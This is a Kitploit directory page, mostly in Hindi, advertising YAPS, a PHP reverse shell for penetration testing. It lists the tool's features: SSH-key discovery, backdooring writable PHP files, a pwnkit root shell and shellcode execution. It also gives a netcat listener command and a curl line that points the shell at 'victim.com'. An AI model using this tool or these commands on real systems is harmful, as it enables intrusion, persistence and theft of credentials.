Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nickguitar/yaps
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubnickguitar/yaps

YAPS

8494 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

एक और PHP शेल - सबसे पूर्ण PHP रिवर्स शेल

रिपॉजिटरी देखें

YAPS - Yet Another PHP Shell

image

हाँ, जैसा कि नाम से पता चलता है, यह एक और PHP रिवर्स शेल है, जो सैकड़ों उपलब्ध में से एक है, लेकिन कुछ लाभों के साथ। यह एक एकल PHP फ़ाइल है जिसमें इसके सभी फ़ंक्शन हैं और आप इसे एक सरल TCP लिसनर (जैसे nc -lp 1337) के माध्यम से नियंत्रित कर सकते हैं।

वर्तमान संस्करण (1.5) में, इसके मुख्य फ़ंक्शन केवल लिनक्स सिस्टम का समर्थन करते हैं, लेकिन मैं इसे विंडोज़ पर भी काम करने की योजना बना रहा हूँ।

यह वर्तमान में अपने पहले संस्करण में है और मैंने अभी तक इसका अधिक परीक्षण नहीं किया है, और अभी भी बहुत सी चीज़ें हैं जो मैं अगले संस्करणों के लिए करने और सुधारने का इरादा रखता हूँ (यह अभी पूरा नहीं हुआ है!), इसलिए कृपया मुझे बताएं यदि आपको कोई बग मिले या सुविधा या सुधार के लिए कोई सुझाव हो। =)

विशेषताएं

  • एकल PHP फ़ाइल (पैकेज, लाइब्रेरी स्थापित करने या ढेर सारी फ़ाइलें डाउनलोड करने की आवश्यकता नहीं)
  • नेटकैट, एनकैट, सोकैट, मल्टी/हैंडलर, लगभग किसी भी लिसनर के साथ काम करता है
  • अनुकूलन योग्य पासवर्ड सुरक्षा
  • .bash_history में कोई लॉग नहीं
  • कुछ एनुमरेशन करता है
    • नेटवर्क जानकारी (इंटरफ़ेस, iptables नियम, सक्रिय पोर्ट)
    • उपयोगकर्ता जानकारी
    • SUID और GUID फ़ाइलों की सूची बनाएं
    • SSH कुंजियाँ खोजें (सार्वजनिक और निजी)
    • क्रॉन्टैब सूचीबद्ध करें
    • लिखने योग्य PHP फ़ाइलों की सूची बनाएं
  • LinPEAS, LinEnum या Linux Exploit Suggester को स्वचालित रूप से डाउनलोड करें
  • दूरस्थ होस्ट पर PHP कोड लिखें और चलाएं
  • एक इंटरैक्टिव रिवर्स शेल स्पॉन करें
  • जितने चाहें उतने कनेक्शन डुप्लिकेट करें
  • स्वचालित अपडेट
  • PHP फ़ाइलों को बैकडोर से संक्रमित करें
  • pwnkit (CVE-2021-4034) के माध्यम से स्वचालित रूट रिवर्स शेल
  • [नया] शेलकोड भेजें और निष्पादित करें

कमियां

  • कनेक्शन एन्क्रिप्टेड नहीं है (अभी तक) (nc SSL का समर्थन नहीं करता)
  • पूरी तरह से इंटरैक्टिव नहीं है (हालांकि आप !interactive से एक इंटरैक्टिव शेल स्पॉन कर सकते हैं)
    • CTRL+C इसे तोड़ देता है; नेविगेट करने के लिए तीर कुंजियों का उपयोग नहीं कर सकते (जब तक आप rlwrap nc -lp <ip> <port> का उपयोग न करें)

उपयोग

  1. TCP लिसनर सेट करें;
  2. अपना IP और पोर्ट सेट करें। यह इस प्रकार किया जा सकता है:
  • 2.1 स्क्रिप्ट की शुरुआत में वेरिएबल्स को संपादित करके;
  • 2.2 पोस्ट अनुरोध के माध्यम से सेट करना (curl -x POST -d "x=ip:port" victim.com/yaps.php);
  1. ब्राउज़र में yaps.php खोलें, इसे कर्ल करें या CLI के माध्यम से चलाएं;
  • 3.1 आप बैनर को दबाने के लिए yaps.php?s या yaps.php?silent सेट कर सकते हैं
  • 3.2 आप php yaps.php ip port के साथ CLI के माध्यम से चला सकते हैं
  1. हैक!

काम करने वाले कमांड

  • !help - सहायता मेनू प्रदर्शित करें
  • !all-colors - सभी रंगों को टॉगल करें (रंगहीन TTY के साथ संगत)
  • !color - PS1 रंग टॉगल करें (केवल स्थानीय रूप से, कोई पर्यावरण चर नहीं बदला जाता)
  • !duplicate - एक और YAPS कनेक्शन स्पॉन करें
  • !enum - LinPEAS और LinEnum को /tmp में डाउनलोड करें और उपयोग के लिए तैयार करें
  • !info - लक्ष्य के बारे में जानकारी सूचीबद्ध करें (वह एनुमरेशन जिसका मैंने ऊपर उल्लेख किया)
  • !infect - लिखने योग्य PHP फ़ाइलों को बैकडोर से संक्रमित करें
  • !interactive - अन्य पोर्ट पर इंटरैक्टिव रिवर्स शेल स्पॉन करें (sudo, su, mysql, आदि के साथ काम करता है)
  • !passwd - पासवर्ड विकल्प (सक्षम, अक्षम, सेट, संशोधित)
  • !php - दूरस्थ होस्ट पर PHP लिखें और चलाएं

स्क्रीनशॉट

स्क्रीनशॉट अनुभाग विस्तार करने के लिए क्लिक करें

Current commands:

commands

Doing some recon:

image

Root reverse shell through CVE-2021-4034

pwn

Sending and running shellcode!

shellcode

Spawning a interactive shell

interactive

Duplicating a YAPS session

duplicate

परिवर्तन लॉग

v1.5 - 12/02/2022

  • !shellcode जोड़ा गया मनमाना शेलकोड प्राप्त करने और चलाने के लिए
  • duplicate() फ़ंक्शन में सुधार (अब आप पोर्ट की एक श्रेणी निर्दिष्ट कर सकते हैं)
  • फ़ंक्शन का नाम stabilize से interactive में बदला गया
  • एम्बेडेड कोड को स्थान बचाने के लिए पैक किया गया
  • टूटी हुई लिंक ठीक की गईं
  • सभी कमांड में "TERM=xterm" जोड़ा गया
  • मामूली सुधार

v1.4 - 04/02/2022

  • CVE-2021-4034 का शोषण करने और रूट रिवर्स शेल स्पॉन करने के लिए !pwnkit जोड़ा गया
  • verify_update() फ़ंक्शन में सुधार
  • मामूली सुधार

v1.3.1 - 01/08/2021

  • बग ठीक किए गए

v1.3 - 28/07/2021

  • PHP फ़ाइलों को बैकडोर से संक्रमित करने के लिए !infect जोड़ा गया
  • !stabilize पेलोड बदला गया (बग ठीक किए गए)

v1.2.2 - 18/07/2021

  • 'update' फ़ंक्शन बदला गया
  • 'connect' फ़ंक्शन बदला गया
  • 'download' फ़ंक्शन में सुधार
  • बग ठीक किए गए

v1.2.1 - 17/07/2021

  • बग ठीक किए गए

v1.2 - 17/07/2021

  • दूसरा शेल स्पॉन करने के लिए !duplicate जोड़ा गया
  • अपडेट सत्यापन जोड़ा गया (--update|-u)
  • CLI तर्क जोड़े गए (--help|-h)
  • तर्कों के माध्यम से सॉकेट जोड़ा गया (php yaps.php ip port)
  • स्टेबलाइज़ शेल विधि बदली गई (अब फ्रीज़ नहीं होता)
  • डाउनलोड विधि बदली गई
  • POST के माध्यम से कनेक्शन विधि बदली गई (एकल पैरामीटर प्राप्त करता है)

v1.1 - 12/07/2021

  • !all-colors जोड़ा गया टर्मिनल रंगों को टॉगल करने और रंगहीन TTY के साथ काम करने के लिए
  • exit कमांड जोड़ा गया सॉकेट बंद करने (शेल छोड़ने) के लिए
  • !stabilize में पेलोड बदला गया HISTSIZE और HISTFILE को अनसेट करने के लिए
  • !info में CPU और meminfo प्राप्त करने की विधि बदली गई

v1.0.1 - 08/07/2021

  • पुराने PHP संस्करणों के साथ संगतता में सुधार के लिए [x,y,z] को array(x,y,z) में बदला गया
  • PHP<5.4 के साथ काम करने के लिए इंटरैक्टिव शेल का पेलोड बदला गया

श्रेय

कुछ विचार इन उपकरणों से प्रेरित थे:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

Arthepsy exploit for pwnkit

https://github.com/arthepsy/CVE-2021-4034/

टूल डाउनलोड करें
  • !pwnkit - CVE-2021-4034 का शोषण करने और रूट रिवर्स शेल स्पॉन करने का प्रयास करता है
  • !shellcode - दूरस्थ होस्ट पर शेलकोड भेजें और चलाएं
  • !suggester - Linux Exploit Suggester को /tmp में डाउनलोड करें और उपयोग के लिए तैयार करें
  • Poisoning PHP files

    infect

    Writing remote PHP code

    remotephp

    Password protected shell

    passprotected